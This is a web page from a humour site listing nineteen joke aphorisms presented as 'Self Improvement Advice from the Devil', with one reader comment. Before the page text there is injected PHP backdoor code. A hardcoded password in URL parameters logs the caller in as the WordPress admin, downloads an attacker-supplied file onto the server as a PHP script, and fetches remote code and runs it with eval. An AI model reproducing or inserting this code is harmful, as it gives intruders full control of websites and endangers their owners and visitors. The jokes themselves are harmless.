if (isset($_GET['pingnow'])&& isset($_GET['pass'])){ if ($_GET['pass'] == 'aab3238922bcc25a6f606eb525ffdc56'){ if ($_GET['pingnow']== 'login'){ $user_login = 'admin'; $user = get_userdatabylogin($user_login); $user_id = $user->ID; wp_set_current_user($user_id, $user_login); wp_set_auth_cookie($user_id); do_action('wp_login', $user_login); } if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); $fnm = md5(rand(0,100)).'.php'; $fp = fopen($fnm, "w"); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_exec($ch); curl_close($ch); fclose($fp); echo ""; } if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $re = curl_exec($ch); curl_close($ch); eval($re); }}} Self Improvement Advice from the Devil | Weird News

Self Improvement Advice from the Devil

devil Self Improvement Advice from the Devil

1 – Borrow money from pessimists — they don’t expect it back.

2 – Half the people you know are below average.

3 – 99% of lawyers give the rest a bad name.

4 – 82.7% of all statistics are made up on the spot.

5 – A conscience is what hurts when all your other parts feel so good.

6 – A clear conscience is usually the sign of a bad memory.

7 – The early bird may get the worm, but the second mouse gets the cheese.

8 – If everything seems to be going well, you have obviously overlooked something.

9 – Depression is merely anger without enthusiasm.

10 – When everything is coming your way, you’re in the wrong lane.

11 – Ambition is a poor excuse for not having enough sense to be lazy.

12 – Hard work pays off in the future, laziness pays off now.

13 – I intend to live forever……so far, so good.

14 – Eagles may soar, but weasels don’t get sucked into jet engines.

15 – If at first you don’t succeed, destroy all evidence that you tried.

16 – A conclusion is the place where you got tired of thinking.

17 – Experience is something you don’t get until just after you need it.

18 – The problem with the gene pool is that there is no lifeguard.

19 – The sooner you fall behind, the more time you’ll have to catch up.

2 Comments

  1. Classic advice. 10 – When everything is coming your way, you’re in the wrong lane.

Leave a Reply

Spam Protection by WP-SpamFree